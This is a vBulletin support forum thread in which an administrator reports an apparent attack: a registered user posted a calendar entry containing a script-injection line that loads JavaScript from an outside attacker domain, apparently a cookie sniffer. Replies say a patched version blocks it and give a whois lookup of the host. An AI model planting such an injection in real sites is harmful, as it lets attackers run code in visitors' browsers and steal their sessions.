Announcement

Collapse
No announcement yet.

hacker attack

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • hacker attack

    I think i found someone trying to break into my vbulletin. They registered and posted this to a calander entry for the current day:

    Code:
    </title><SCRIPT SRC=http://www.sec-area.com/sinffer/cool.js?id=482></SCRIPT>
    When i visit this site, it says its the "World Defacing Team" or something like that. I banned this user who posted the calander entry, but i am concerned about what the script does and what they might have been up to. Anybody have any advice for me?

    Thanks,
    --jake

  • #2
    If you are using 3.6.7pl1, then you are secure against this attack.
    Translations provided by Google.

    Wayne Luke
    The Rabid Badger - a vBulletin Cloud demonstration site.
    vBulletin 5 API - Full / Mobile
    Vote for your favorite feature requests and the bugs you want to see fixed.

    Comment


    • #3
      I Googled them and they have been attacking other sites:

      http://www.securityfocus.com/archive...100/0/threaded

      This is the Shazou look-up:

      Geo Ip Data: Server Location WhoIs Lookup: Domain Owner
      Server: www,sec-area,com
      IP Address: 76,163,122.234
      Organization:
      Country: United States
      City, State: ,
      Organization Name: Ecommerce Corporation
      Address: 247 Mitch Lane
      City, State: Hopkinsville , KY
      Postal Code: 42240
      Country: US

      I'm off to ban this IP right now.

      Comment

      widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
      Working...
      X